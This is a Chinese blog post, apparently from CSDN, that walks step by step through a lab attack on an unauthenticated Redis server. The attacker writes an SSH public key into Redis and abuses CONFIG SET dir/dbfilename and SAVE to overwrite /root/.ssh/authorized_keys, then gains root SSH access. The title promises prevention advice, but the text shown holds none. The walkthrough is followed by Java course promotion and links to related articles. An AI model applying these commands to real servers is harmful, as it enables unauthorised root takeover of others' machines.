卧槽~ 一文搞懂 Redis 挖矿原理及如何防范

于 2024-04-20 03:43:04 发布
阅读量934 收藏 20
点赞数 12
分类专栏: 程序员 文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84047990/article/details/137984843
版权

2、开始搞事情

  • 2.1 创建一对秘钥

通过ssh-keygen生成一对,当然可以使用已经有的都没有问题。

root@kali:/usr/local/src# ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

复制代码

接下来通过公钥生成攻击键值

(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”😉 > foo.txt

复制代码

内容如下

root@kali:/tmp/rediskey# cat foo.txtssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

复制代码

这里前后增加两个换行符是为了防止数据连接在一起造成失效问题。

  • 2.2 配置Key到Redis中

操作如下:

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set barOK

复制代码

登录Redis进行检查,是否已经写入进Redis中。

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129192.168.243.129:6379> get bar"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"

复制代码

  • 2.3 通过Redis保存机制替换系统文件

且看如下操作

192.168.243.129:6379> config set dir /root/.sshOK192.168.243.129:6379> config get dir1) "dir"2) "/root/.ssh"192.168.243.129:6379> config set dbfilename "authorized_keys"OK192.168.243.129:6379> saveOK192.168.243.129:6379> exit

复制代码

这个时候,我们登录远程主机看下效果。

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129The authenticity of host ‘192.168.243.129 (192.168.243.129)’ can’t be established.ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added ‘192.168.243.129’ (ECDSA) to the list of known hosts.Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1root@kali:~#

复制代码

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Java开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

如果你觉得这些内容对你有帮助,可以扫码获取!!(备注Java获取)

img

最后

我还通过一些渠道整理了一些大厂真实面试主要有:蚂蚁金服、拼多多、阿里云、百度、唯品会、携程、丰巢科技、乐信、软通动力、OPPO、银盛支付、中国平安等初,中级,高级Java面试题集合,附带超详细答案,希望能帮助到大家。

新鲜出炉的蚂蚁金服面经,熬夜整理出来的答案,已有千人收藏

还有专门针对JVM、SPringBoot、SpringCloud、数据库、Linux、缓存、消息中间件、源码等相关面试题。

新鲜出炉的蚂蚁金服面经,熬夜整理出来的答案,已有千人收藏

《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!
-tNcXB4qV-1713555771354)]

《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!

2401_84047990
关注
专栏目录
Redis——Redis Cluster集群原理
庄小焱
03-14 4653
摘要 我们平时习惯于使用 Rabbitmq 和 Kafka 作为消息队列中间件,来给应用程序之间增加异步消息传递功能。这两个中间件都是专业的消息队列中间件,特性之多超出了大多数人的理解能力。使用过 Rabbitmq 的同学知道它使用起来有多复杂,发消息之前要创建 Exchange,再创建 Queue,还要将 Queue 和 Exchange 通过某种规则绑定起来,发消息的时候要指定 routingkey,还要控制头部信息。消费者在消费消息之前也要进行上面一系列的繁琐过程。但是绝大多数情况下,虽然我们的消息
Redis——Redis数据结构底层原理
庄小焱
03-31 3702
本博文主要介绍Redis数据结构底层原理。帮助大家更好的学习和理解Redis数据结构。Redis发展到现在已经有 9 种数据类型了,其中最基础、最常用的数据类型有 5 种,它们分别是:字符串类型、列表类型、哈希表类型、集合类型、有序集合类型,而在这 5 种数据类型中最常用的是字符串类型。这五种数据结构的底层实现丰富。
B站---【狂神说Java】JavaWeb入门到实战---笔记
热门推荐
bell_love的博客
04-23 18万+
JavaWebJava Web 1、基本概念web开发: ·web,网页的意思,www.baidu.com· 静态web 。html,sss 。提供给所有人看的数据始终不会发生变化! 动态web 。淘宝,几乎是所有的网站; 。提供给所有人看的数据始终会发生变化,每个人在不同的时间,不同的地点看到的信息各不相同! 。技术栈:Servlet/ISP,ASP,PHP ...
基于Spring MVC + Spring + MyBatis的【学生管理管理系统】
最新发布
D1561691的博客
04-12 768
我还通过一些渠道整理了一些大厂真实面试主要有:蚂蚁金服、拼多多、阿里云、百度、唯品会、携程、丰巢科技、乐信、软通动力、OPPO、银盛支付、中国平安等初,中级,高级Java面试题集合,附带超详细答案,希望能帮助到大家。还有专门针对JVM、SPringBoot、SpringCloud、数据库、Linux、缓存、消息中间件、源码等相关面试题。《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
sqlalchemy创建表
godme
10-06 5583
通过sqlalchemy创建表需要三要素:引擎,基类,元素 from sqlalchemy import create_engine from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import Column,Integer,String 引擎:也就是实体数据库连接engine = create_e
使用sqlalchemy创建数据表
qq_43593912的博客
07-25 2626
一、创建测试连接文件 ①有两个包是需要我们提前在虚拟环境中安装好的: pip install pymysql pip install sqlalchemy ②创建models的python包,目录结构如下: ③在db.py中,代码如下: from sqlalchemy import create_engine HOST_NAME = '127.0.0.1' # 主机 PORT = '330...
【SSM】Spring+SpringMVC+MyBatis整合之学生管理系统
qq_37118674的博客
06-16 1万+
刚刚学习完SSM整合 就想着自己写一个学生管理系统… 一.搭建环境 1.创建数据库和创建表 做学生管理系统 肯定是需要2张表的 第一就是User表 用来管理用户名和密码 第二就是Student表 用来存储学生的信息 2.SSM环境搭建 创建一个Maven的web项目之后 首先导入我们之前自己整合的一些文件(这里我博客都有写) pom.xml坐标文件, applicationContext.xm......
一文快速搞懂 Redis 的几种数据类型
wadfdhsajd的博客
05-19 2288
Redis 有几种数据类型 Redis 是一个以 key-value 存储系统,一个 Key 键值对应一个 value 值,键值不能重复,它支持存储的 value 类型有 5 种。 Redis 支持五种数据类型: String(字符串) List(列表) Set(集合) Hash(哈希) Zset(sorted set:有序集合) Redis 的基本指令 在讲数据类型前先来看一下 Redis 的基本指令,主要是针对 Key
一文弄懂redis分布式缓存之微博推送技术方案
a1472750149的博客
12-16 5043
1️⃣业务场景分析 关注微博 登录首页展示了我关注的所有人发的微博,展示形式是列表 滚动有分页加载 2.个人微博 我发的微博展示在个人微博,展示形式也是列表 滚动有分页加载 2️⃣ 基于redis技术方案 发微博 文章 个人微博 关注微博 用户 服务器 采用map结构保存 采用list结构保存文章id 也采用list结构保存文章id 关注微博和个人微博的展示形式都是列表,用redis的list结构存储。 滚动有分页加载,用redis的lrange ...
Redis原理详解
weixin_39327556的博客
05-15 6851
目录 1、什么是redis 2、为什么会出现redis 3、应用场景 4、架构原理 5、IO多路复用机制 6、redis为什么快 7、redis 数据淘汰策略 8、数据类型以及使用场景 9、持久化流程 1.RDB(默认开启() 保存流程(BGSAVE) 2.AOF 重写流程 10、常见问题解决方案 雪崩 穿透 击穿(热点Key) 如何解决redis的并发竞争key问题 数据不一致原因 1、什么是redis Redis是一个开源的key-value存...
基于SpringMVC的学生成绩管理
12-27
可以在网页上实现对mysql数据库的增删改查,使用了springmvc框架,界面很友好,适合初学者调试。
学生管理系统(springMVC+MyBatis)
05-18
学生管理系统(springMVC+MyBatis),包含数据库和前端界面代码
学生管理系统(SpringMVC+Spring+Mybatis)
01-07
该SMS是之前的升级版,整合了SpringMVC、Spring和MyBatis,对学习SSM框架的整合大有好处
基于 spring mvc,hibernate,spring,maven 的学生管理系统源码
03-26
基于 spring mvc,hibernate,spring,maven 的学生管理系统源码。
基于Spring MVC + Spring + MyBatis的【学生信息管理系统】.zip
11-20
使用环境:MyEclipse/Eclipse + Tomcat + MySQL。 使用技术:Spring MVC + Spring + MyBatis / JSP + Servlet + JavaBean + JDBC。
狂神说-JavaWeb
shenxinde的博客
03-17 3538
一、基本概念 1.1、前言 web 开发: web,网页的意思,如www.baidu.com 静态web html,css 提供给所有人看的数据始终不会发生变化 动态web 淘宝,几乎是所有的网站 提供给所有人看的数据始终会发生变化,每个人在不同的时间,不同的地点看到的信息各不相同! 技术栈:Servlet/JSP,ASP,PHP 在java中,动态web资源开发的技术统称为javaweb 1.2、web应用程序 web应用程序:可以提供浏览器访问的程序: a.html、b.h
Python笔记-使用sqlalchemy根据类创建数据库
IT1995的博客
03-16 6291
这里有一点要提的 这个mysql+pymysql,这个mysql会通过字符串导入对应的模块这里要预装下mysql模块: 逻辑操作: 使用create_engine创建数据库连接, 使用sessionmaker操作用于操作数据库的session。 构造一个declarative_base()的基类。 构造一个子类设置数据库表中的各个域。 最后使用metedate.create_...
【狂神说Java】---JavaWeb
pangyuan0928的博客
03-21 2047
JavaWeb Java + Web 1.基本概念 1.1 前言 web开发: web ,网页的意思, www.baidu.com 静态web html .css 提供给所有人看到的数据不会发生变化 动态web 淘宝,几乎所有网站 提供给所有人看的数据是会发生变化,每个人在不同的时间,不同的地点看到的信息各不相同 技术栈:Servlet/ISP,ASP,PHP 在java中,动态web资源开发的技术统称为JavaWeb 1.2 Web应用程序 web应用程序:可以提供浏
SQLALchemy之创建表,删除表
weixin_33851429的博客
03-30 517
1、创建引擎 "数据库+第三方模块://用户名:密码@数据库服务端IP:端口号/数据库名?编码" engine = create_engine( "mysql+pymysql://root:123@127.0.0.1:3306/t1?charset=utf8", max_overflow=0, # 超过连接池大小外最多创建的连接 pool_size=5, ...
深入解析Redis设计原理及实现技术
资源摘要信息:"Redis设计与实现" Redis是一个开源的内存数据结构存储系统,用作数据库缓存和消息中间件。它支持多种类型的数据结构,如字符串(strings)、散列(hashes)、列表(lists)、集合(sets)、有序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值